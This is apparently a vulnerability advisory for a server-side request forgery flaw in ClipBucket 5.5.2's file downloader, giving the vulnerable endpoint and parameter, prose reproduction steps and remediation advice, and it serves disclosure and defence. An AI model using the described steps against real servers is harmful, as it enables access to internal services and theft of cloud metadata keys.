ClipBucket Server-Side Request Forgery Vulnerability in File Downloader Component

A server-side request forgery (SSRF) vulnerability has been identified in ClipBucket version 5.5.2 Build #90. This issue allows authenticated low-privileged users to execute arbitrary code by exploiting the 'file' parameter in 'upload/actions/file_downloader.php'. The vulnerability arises because the application fails to properly validate or restrict URLs, enabling attackers to make the server connect to internal resources or cloud metadata endpoints.

Impact

Exploitation of this vulnerability could lead to unauthorized access to internal services, disclosure of sensitive metadata or API keys, and potential pivoting into internal networks or systems.

Reproduction

To reproduce this vulnerability, an authenticated user must send a POST request to 'upload/actions/file_downloader.php' with a valid session cookie and a 'file' parameter that points to an internal resource or cloud metadata service. If the server successfully fetches the resource or the request times out, it demonstrates access via SSRF.

Remediation

To address this vulnerability, validate and restrict the 'file' parameter to allow only known safe hosts. Implement an allowlist, block private IP ranges and cloud metadata addresses, and ensure that only HTTP or HTTPS schemes are permitted. Additionally, apply network egress rules to prevent the application from initiating connections to internal service ranges.